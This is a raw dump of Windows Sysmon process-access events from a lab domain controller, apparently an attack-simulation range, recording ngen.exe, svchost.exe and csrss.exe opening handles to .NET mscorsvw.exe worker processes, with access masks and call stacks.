13:50:15.587{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CB03-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.509{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CA03-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.509{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CA03-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.509{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CA03-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.415{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C903-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.415{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C903-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.415{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C903-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C803-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.353{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C803-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.353{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C803-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C703-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C703-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C703-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C603-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.212{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C603-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.212{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C603-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.150{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C503-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.150{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C503-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.150{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C503-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.087{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C403-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.072{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C403-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C403-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 